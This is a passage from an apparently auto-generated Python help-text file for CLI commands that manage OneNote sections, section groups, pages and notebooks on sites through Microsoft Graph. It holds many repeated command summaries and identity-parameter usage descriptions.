name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in sites" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for sites" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from sites" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user 